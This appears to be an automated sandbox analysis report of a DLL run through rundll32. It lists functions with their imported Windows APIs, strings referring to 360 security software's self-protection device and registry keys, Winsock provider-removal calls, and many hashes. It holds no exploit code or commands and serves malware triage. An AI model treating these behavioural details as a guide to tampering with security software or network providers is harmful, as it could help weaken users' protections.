Instruction ID: c87333ac7bcb44b69379473da2adcf9225e28ba0b3bfb3a3c4204cf647e2c29f
Opcode Fuzzy Hash: 73e3a869f78964b23eaffc721e09444bf3a0d7b676e7666a508320a6b867a5bd
Instruction Fuzzy Hash: B5110337612B08C6FB96DF64D8583682360FB5DFA9F258704DA6B49599CF38C64DC340

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180018E8C Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 41fileCOMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,0000000180065B3D), ref: 0000000180018E96
CreateFileW.KERNEL32(?,?,?,?,?,?,?,0000000180065B3D), ref: 0000000180018EC6
DeviceIoControl.KERNEL32 ref: 0000000180018F04
CloseHandle.KERNEL32(?,?,?,?,?,?,?,0000000180065B3D), ref: 0000000180018F0F

Strings

L ", xrefs: 0000000180018EFC
\\.\360SelfProtection, xrefs: 0000000180018E9E

Memory Dump Source

Source File: 00000006.00000002.2138015920.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.2137989334.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138205778.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138222360.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138257223.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd

Similarity

API ID: CloseControlCreateCurrentDeviceFileHandleProcess
String ID: L "$\\.\360SelfProtection
API String ID: 3778458602-907869749
Opcode ID: e256c9444f2bf81226e555b6f7292d8a7bd12b46bc34df817c0f54cce6c08caa
Instruction ID: 4989c80b025c73f727db9230e342af37d309858987cbaecb77f10a65d22bbdba
Opcode Fuzzy Hash: e256c9444f2bf81226e555b6f7292d8a7bd12b46bc34df817c0f54cce6c08caa
Instruction Fuzzy Hash: F6111C32618B84D7C7518F64F88478AB7A0F78C7A4F444725E6AA43B68EF78C65CCB00

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800184B8 Relevance: 9.3, APIs: 6, Instructions: 270COMMON

Download Yara Rule

APIs

??3@YAXPEAX@Z.MSVCRT ref: 0000000180018666
??_V@YAXPEAX@Z.MSVCRT ref: 000000018001868A
??_V@YAXPEAX@Z.MSVCRT ref: 00000001800186B7
??_V@YAXPEAX@Z.MSVCRT ref: 00000001800186D7

Part of subcall function 0000000180042FC4: WideCharToMultiByte.KERNEL32 ref: 0000000180042FFB
Part of subcall function 0000000180042FC4: ??_V@YAXPEAX@Z.MSVCRT ref: 0000000180043016
Part of subcall function 0000000180042FC4: WideCharToMultiByte.KERNEL32 ref: 000000018004306B

??_V@YAXPEAX@Z.MSVCRT ref: 0000000180018867

Part of subcall function 000000018004388C: ??_V@YAXPEAX@Z.MSVCRT ref: 0000000180043AB7

Part of subcall function 0000000180043F2C: ??_V@YAXPEAX@Z.MSVCRT ref: 0000000180044096

Memory Dump Source

Source File: 00000006.00000002.2138015920.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.2137989334.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138205778.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138222360.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138257223.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd

Similarity

API ID: ByteCharMultiWide$??3@
String ID:
API String ID: 652292005-0
Opcode ID: d5eaac9880b29e7d0af136669fdebebd909549339380b54f119e65074af5ce41
Instruction ID: 16cab60fb696caa1ac382d07db4514fcd7f2788f0d4e97422f2d8c76aa010f09
Opcode Fuzzy Hash: d5eaac9880b29e7d0af136669fdebebd909549339380b54f119e65074af5ce41
Instruction Fuzzy Hash: 95C14A32B00B449AEB61CFA1E8407DD33B6F748798F548125EE9967B98DF34C62AD344

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180004D74 Relevance: 9.2, APIs: 6, Instructions: 219COMMON

Download Yara Rule

APIs

wcsstr.MSVCRT ref: 0000000180004E12
wcsstr.MSVCRT ref: 0000000180004E38
wcsstr.MSVCRT ref: 0000000180004EF1
memmove.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,0000000180001A9F), ref: 0000000180004F53
wcsstr.MSVCRT ref: 0000000180004FBE
_errno.MSVCRT ref: 000000018000504A

Memory Dump Source

Source File: 00000006.00000002.2138015920.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.2137989334.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138205778.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138222360.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138257223.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd

Similarity

API ID: wcsstr$_errnomemmove
String ID:
API String ID: 3323953840-0
Opcode ID: 251354a66c982ebe395b5198ba1b60466afa3abfe6d2f318c4ac3c1dc85cfacb
Instruction ID: 824f22201ec0d57d4a2227744580b71807502b4fbd2fda829f419a9b6e1dff6e
Opcode Fuzzy Hash: 251354a66c982ebe395b5198ba1b60466afa3abfe6d2f318c4ac3c1dc85cfacb
Instruction Fuzzy Hash: CF810572701A4881EAA6DB14A4447AE77A0FB4CBE4F15C215FFAE4B7D4DE38C6498704

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800505E0 Relevance: 9.2, APIs: 6, Instructions: 196networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32 ref: 0000000180050638
WSCDeinstallProvider.WS2_32 ref: 00000001800507A4
WSCDeinstallProvider32.WS2_32 ref: 00000001800507AC
WSCDeinstallProvider.WS2_32 ref: 0000000180050862
WSCDeinstallProvider32.WS2_32 ref: 000000018005086A
WSACleanup.WS2_32 ref: 00000001800508F4

Memory Dump Source

Source File: 00000006.00000002.2138015920.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.2137989334.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138205778.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138222360.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138257223.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd

Similarity

API ID: Deinstall$ProviderProvider32$CleanupStartup
String ID:
API String ID: 348239931-0
Opcode ID: 4fc830036e70fcdad210563e15636e8950cfeeae8d6d629c7bbfe77b3d9d1d9b
Instruction ID: c360e4d789f3669f84b45de69cf2c2640493478b51e108b497c61621dba60db4
Opcode Fuzzy Hash: 4fc830036e70fcdad210563e15636e8950cfeeae8d6d629c7bbfe77b3d9d1d9b
Instruction Fuzzy Hash: 48910332604A88C6EB92CB65E4547EE77A4F78C7E4F618111FA8D276A4DF39C649CB00

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180032E5C Relevance: 9.2, APIs: 6, Instructions: 150COMMON

Download Yara Rule

APIs

Part of subcall function 000000018000A7AC: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000180001020), ref: 000000018000A7D5

Part of subcall function 000000018000B560: ??2@YAPEAX_K@Z.MSVCRT ref: 000000018000B584
Part of subcall function 000000018000B560: SysAllocString.OLEAUT32 ref: 000000018000B5A6

Part of subcall function 000000018003AE08: SysFreeString.OLEAUT32 ref: 000000018003AE51
Part of subcall function 000000018003AE08: ??_V@YAXPEAX@Z.MSVCRT ref: 000000018003AE64
Part of subcall function 000000018003AE08: ??3@YAXPEAX@Z.MSVCRT ref: 000000018003AE77

SysFreeString.OLEAUT32 ref: 0000000180032EF4
??_V@YAXPEAX@Z.MSVCRT ref: 0000000180032F07
??3@YAXPEAX@Z.MSVCRT ref: 0000000180032F1A
SysFreeString.OLEAUT32 ref: 0000000180032F63
??_V@YAXPEAX@Z.MSVCRT ref: 0000000180032F76
??3@YAXPEAX@Z.MSVCRT ref: 0000000180032F89

Memory Dump Source

Source File: 00000006.00000002.2138015920.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.2137989334.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138205778.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138222360.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138257223.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd

Similarity

API ID: String$??3@Free$??2@AllocHeapProcess
String ID:
API String ID: 195827-0
Opcode ID: a0ac78459233da017ac87d6453e8a81be7370a52e333d62a5881ff707d93bed7
Instruction ID: 472ff7a9124bb4c66568a88574ce92508997c8508967d0cb70e73e2f7ddd2399
Opcode Fuzzy Hash: a0ac78459233da017ac87d6453e8a81be7370a52e333d62a5881ff707d93bed7
Instruction Fuzzy Hash: B951BD32701A4886EB46DF65D8403AD73B0FB49BE4F098621EB2957BE9DF38C959C340

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180034178 Relevance: 9.1, APIs: 6, Instructions: 147COMMON

Download Yara Rule

APIs

Part of subcall function 000000018000A7AC: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000180001020), ref: 000000018000A7D5

Part of subcall function 000000018000B560: ??2@YAPEAX_K@Z.MSVCRT ref: 000000018000B584
Part of subcall function 000000018000B560: SysAllocString.OLEAUT32 ref: 000000018000B5A6

Part of subcall function 000000018003AE08: SysFreeString.OLEAUT32 ref: 000000018003AE51
Part of subcall function 000000018003AE08: ??_V@YAXPEAX@Z.MSVCRT ref: 000000018003AE64
Part of subcall function 000000018003AE08: ??3@YAXPEAX@Z.MSVCRT ref: 000000018003AE77

SysFreeString.OLEAUT32 ref: 000000018003420F
??_V@YAXPEAX@Z.MSVCRT ref: 0000000180034222
??3@YAXPEAX@Z.MSVCRT ref: 0000000180034235
SysFreeString.OLEAUT32 ref: 0000000180034279
??_V@YAXPEAX@Z.MSVCRT ref: 000000018003428C
??3@YAXPEAX@Z.MSVCRT ref: 000000018003429F

Memory Dump Source

Source File: 00000006.00000002.2138015920.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.2137989334.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138205778.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138222360.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138257223.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd

Similarity

API ID: String$??3@Free$??2@AllocHeapProcess
String ID:
API String ID: 195827-0
Opcode ID: ceda01c74325736d26a0411a727c02681ceb51477494a67f089079f3182e5468
Instruction ID: d6e040c62356dd28a52f4054929385a923e12d2376c870478276763e31a13ced
Opcode Fuzzy Hash: ceda01c74325736d26a0411a727c02681ceb51477494a67f089079f3182e5468
Instruction Fuzzy Hash: 9D516F33701B4982EB469F65D85039E63A0FB89FA4F498221EB295B7D9DF38C549C340

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800322A0 Relevance: 9.1, APIs: 6, Instructions: 147COMMON

Download Yara Rule

APIs

Part of subcall function 000000018000A7AC: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000180001020), ref: 000000018000A7D5

Part of subcall function 000000018000B560: ??2@YAPEAX_K@Z.MSVCRT ref: 000000018000B584
Part of subcall function 000000018000B560: SysAllocString.OLEAUT32 ref: 000000018000B5A6

Part of subcall function 000000018003AE08: SysFreeString.OLEAUT32 ref: 000000018003AE51
Part of subcall function 000000018003AE08: ??_V@YAXPEAX@Z.MSVCRT ref: 000000018003AE64
Part of subcall function 000000018003AE08: ??3@YAXPEAX@Z.MSVCRT ref: 000000018003AE77

SysFreeString.OLEAUT32 ref: 0000000180032337
??_V@YAXPEAX@Z.MSVCRT ref: 000000018003234A
??3@YAXPEAX@Z.MSVCRT ref: 000000018003235D
SysFreeString.OLEAUT32 ref: 00000001800323A1
??_V@YAXPEAX@Z.MSVCRT ref: 00000001800323B4
??3@YAXPEAX@Z.MSVCRT ref: 00000001800323C7

Memory Dump Source

Source File: 00000006.00000002.2138015920.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.2137989334.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138205778.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138222360.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138257223.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd

Similarity

API ID: String$??3@Free$??2@AllocHeapProcess
String ID:
API String ID: 195827-0
Opcode ID: 1487f1b9042455cadd1f594916249c517a85c0241772127b20d59336a7db92ce
Instruction ID: b9a7bc9aefba1d0cd95c21a72bfdce90d94dfcaa7ac1bda6bd9d80d9113677c1
Opcode Fuzzy Hash: 1487f1b9042455cadd1f594916249c517a85c0241772127b20d59336a7db92ce
Instruction Fuzzy Hash: 55516032701B4882EB469F65D85039E73A0FB49FE4F098625EB69577D9DF38C649C380

Uniqueness

Uniqueness Score: -1.00%

Function 000000018003288C Relevance: 9.1, APIs: 6, Instructions: 147COMMON

Download Yara Rule

APIs

Part of subcall function 000000018000A7AC: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000180001020), ref: 000000018000A7D5

Part of subcall function 00000001800298FC: GetFileAttributesW.KERNEL32 ref: 000000018002998C
Part of subcall function 00000001800298FC: GetFileAttributesW.KERNEL32 ref: 000000018002999E

Part of subcall function 000000018000B560: ??2@YAPEAX_K@Z.MSVCRT ref: 000000018000B584
Part of subcall function 000000018000B560: SysAllocString.OLEAUT32 ref: 000000018000B5A6

Part of subcall function 000000018003AE08: SysFreeString.OLEAUT32 ref: 000000018003AE51
Part of subcall function 000000018003AE08: ??_V@YAXPEAX@Z.MSVCRT ref: 000000018003AE64
Part of subcall function 000000018003AE08: ??3@YAXPEAX@Z.MSVCRT ref: 000000018003AE77

SysFreeString.OLEAUT32 ref: 0000000180032923
??_V@YAXPEAX@Z.MSVCRT ref: 0000000180032936
??3@YAXPEAX@Z.MSVCRT ref: 0000000180032949
SysFreeString.OLEAUT32 ref: 000000018003298D
??_V@YAXPEAX@Z.MSVCRT ref: 00000001800329A0
??3@YAXPEAX@Z.MSVCRT ref: 00000001800329B3

Memory Dump Source

Source File: 00000006.00000002.2138015920.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.2137989334.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138205778.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138222360.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138257223.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd

Similarity

API ID: String$??3@Free$AttributesFile$??2@AllocHeapProcess
String ID:
API String ID: 2343307612-0
Opcode ID: 8e393e3a3852b3cedc11bf39ea6ffb031ff90eabb787ce897587cb6f9badf564
Instruction ID: 3edc698dfee31cca13762dbc840380725e1013da3230f8d99093220343b8c6e9
Opcode Fuzzy Hash: 8e393e3a3852b3cedc11bf39ea6ffb031ff90eabb787ce897587cb6f9badf564
Instruction Fuzzy Hash: 21515F32701B4882EB46DF65D85039D73A0FB49FA4F098225EB695B7E9DF38C949C380

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180026754 Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 142stringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00000001800267E9
lstrcmpiW.KERNEL32 ref: 0000000180026826

Strings

{42042206-2D85-11D3-8CFF-005004838597}, xrefs: 000000018002681B
ShellEx\IconHandler, xrefs: 0000000180026798
\DefaultIcon, xrefs: 0000000180026863
clsid\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon\, xrefs: 0000000180026851

Memory Dump Source

Source File: 00000006.00000002.2138015920.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.2137989334.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138205778.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138222360.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138257223.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd

Similarity

API ID: lstrcmpimemset
String ID: ShellEx\IconHandler$\DefaultIcon$clsid\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon\${42042206-2D85-11D3-8CFF-005004838597}
API String ID: 3784069311-1340094651
Opcode ID: 0a12214a811aa3540a0b94e6fb55089740eaeb8575e012286690255a8f8d330d
Instruction ID: 9f0af0b831dc55336fcff299f0060eabbe44d87f67dffe850d980bb31fffbbb0
Opcode Fuzzy Hash: 0a12214a811aa3540a0b94e6fb55089740eaeb8575e012286690255a8f8d330d
Instruction Fuzzy Hash: 0251A672601E4982EB52DB29D8817DE6760FB897F4F508312FA6D436E5DF38C689C740

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800503B8 Relevance: 9.1, APIs: 6, Instructions: 136COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 0000000180050421
ExpandEnvironmentStringsW.KERNEL32 ref: 0000000180050458
EnterCriticalSection.KERNEL32 ref: 00000001800504D4
LeaveCriticalSection.KERNEL32 ref: 000000018005051D
ExpandEnvironmentStringsW.KERNEL32 ref: 0000000180050544
LeaveCriticalSection.KERNEL32 ref: 00000001800505AF

Memory Dump Source

Source File: 00000006.00000002.2138015920.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.2137989334.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138205778.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138222360.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138257223.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd

Similarity

API ID: CriticalSection$EnterEnvironmentExpandLeaveStrings
String ID:
API String ID: 3103530258-0
Opcode ID: 4711d94ae21e721216315d7d413d31c061a842b8496e77f250252f344626d692
Instruction ID: b0c21a69e9994dd49745b429a24057b93f4d6bf7018e4c24e81fb4468a7e2a6c
Opcode Fuzzy Hash: 4711d94ae21e721216315d7d413d31c061a842b8496e77f250252f344626d692
Instruction Fuzzy Hash: 0051AF32711A4882EB82CF29D8843DE7761F789BE8F549211FE69176A5DF39C64AC700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180066808 Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 114COMMON

Download Yara Rule

APIs

wcsstr.MSVCRT ref: 0000000180066883

Part of subcall function 0000000180066608: RegOpenKeyExW.ADVAPI32 ref: 0000000180066653
Part of subcall function 0000000180066608: RegQueryValueExW.ADVAPI32 ref: 0000000180066696
Part of subcall function 0000000180066608: RegCloseKey.ADVAPI32 ref: 00000001800666AA

Strings

"%s" %s, xrefs: 00000001800668D4
/elevated, xrefs: 0000000180066879

Memory Dump Source

Source File: 00000006.00000002.2138015920.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.2137989334.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138205778.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138222360.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138257223.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd

Similarity

API ID: CloseOpenQueryValuewcsstr
String ID: "%s" %s$/elevated
API String ID: 1248106594-1382985213
Opcode ID: 7d994b47a6feae35010406933b82370a9ece06ded3bcb5ee78e307a99859ddb1
Instruction ID: f3329ece6a2879d43efc8f52936060a6c90d44f89bf07b9cf1bbe3f09b4200fa
Opcode Fuzzy Hash: 7d994b47a6feae35010406933b82370a9ece06ded3bcb5ee78e307a99859ddb1
Instruction Fuzzy Hash: E241A432702B4489EB95CF65D8407DC33A5FB88BD4F15861AAE5E53BA4DF34C659C340

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180068954 Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 000000018006A424: RegOpenKeyExW.ADVAPI32(?,?,?,?,00000000,0000000180068993,?,?,?,?,00000001,00000000,?,0000000180068D41), ref: 000000018006A44B

memset.MSVCRT ref: 00000001800689A4

Part of subcall function 000000018006A490: RegQueryValueExW.ADVAPI32(?,?,?,?,?,?,00000001800689D0,?,?,?,?,00000001,00000000,?,0000000180068D41), ref: 000000018006A4A9

Strings

Operator, xrefs: 00000001800689C1
SOFTWARE\360MachineSignature, xrefs: 0000000180068980
SignData, xrefs: 0000000180068A87
ExpirationDate, xrefs: 0000000180068A4B
IssueDate, xrefs: 0000000180068A07

Memory Dump Source

Source File: 00000006.00000002.2138015920.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.2137989334.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138205778.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138222360.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138257223.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd

Similarity

API ID: OpenQueryValuememset
String ID: ExpirationDate$IssueDate$Operator$SOFTWARE\360MachineSignature$SignData
API String ID: 733315865-1479031278
Opcode ID: 024b379d581b3895d461dc1fafaaa22704cd15f8aacd44fa0de35045f287b812
Instruction ID: ca32e24e8d646fa6672ed224415891838e44a9bb2fa0ab3c5403e0472a1cb0df
Opcode Fuzzy Hash: 024b379d581b3895d461dc1fafaaa22704cd15f8aacd44fa0de35045f287b812
Instruction Fuzzy Hash: DA411972B00B149AFB92DBA5D8447DD73B5BB487C8F148A16AE6853B58EF34C708CB00

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180052E84 Relevance: 9.1, APIs: 6, Instructions: 87networkCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 0000000180052EE6
LeaveCriticalSection.KERNEL32 ref: 0000000180052F32
WSAStartup.WS2_32 ref: 0000000180052F68
WSCUnInstallNameSpace.WS2_32 ref: 0000000180052F85
WSAGetLastError.WS2_32 ref: 0000000180052F94

Part of subcall function 00000001800432C8: memset.MSVCRT ref: 0000000180043335

WSACleanup.WS2_32 ref: 0000000180052FA1

Memory Dump Source

Source File: 00000006.00000002.2138015920.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.2137989334.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138205778.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138222360.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138257223.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd

Similarity

API ID: CriticalSection$CleanupEnterErrorInstallLastLeaveNameSpaceStartupmemset
String ID:
API String ID: 3860525367-0
Opcode ID: 566063b2480ce26a8a1017dda99dddd59a3f866f59b7cd308274edefec3830af
Instruction ID: 37d746e663b56e28a6a3e394405e8b675d481f719bc3bdb0db42ce8d24bf20fd
Opcode Fuzzy Hash: 566063b2480ce26a8a1017dda99dddd59a3f866f59b7cd308274edefec3830af
Instruction Fuzzy Hash: 57316E31700A4886F6A29F25EC443E973A0FB8DBD5F548531B96A972A1DF39C7898700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180064338 Relevance: 9.1, APIs: 6, Instructions: 67fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32 ref: 0000000180064372
GetFileSize.KERNEL32 ref: 0000000180064394
GetFileSize.KERNEL32 ref: 00000001800643A2
ReadFile.KERNEL32 ref: 00000001800643DE
??_V@YAXPEAX@Z.MSVCRT ref: 0000000180064406
CloseHandle.KERNEL32 ref: 000000018006440F

Memory Dump Source

Source File: 00000006.00000002.2138015920.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.2137989334.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138205778.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138222360.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138257223.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd

Similarity

API ID: File$Size$CloseCreateHandleRead
String ID:
API String ID: 1601809017-0
Opcode ID: 6c38b284369adc8e8a95ca7bd81b2def578c31ecd07c0865210070f76e2fb98a
Instruction ID: 513f97a3dac13d024bc23301dce07c49bc5a225dcf8c593d0dc48b4e525c804c
Opcode Fuzzy Hash: 6c38b284369adc8e8a95ca7bd81b2def578c31ecd07c0865210070f76e2fb98a
Instruction Fuzzy Hash: 2E21803260475487E7819F2AE8443997BA1F788FD0F658225EF6547BA4DF38C64ACB00

Uniqueness

Uniqueness Score: -1.00%

Function 000000018004CD44 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 279COMMON

Download Yara Rule

APIs

??2@YAPEAX_K@Z.MSVCRT ref: 000000018004CDF5
??2@YAPEAX_K@Z.MSVCRT ref: 000000018004CE1A
??3@YAXPEAX@Z.MSVCRT ref: 000000018004D181

Strings

Num_Catalog_Entries, xrefs: 000000018004CD4A
Catalog_Entries, xrefs: 000000018004CD48

Memory Dump Source

Source File: 00000006.00000002.2138015920.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.2137989334.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
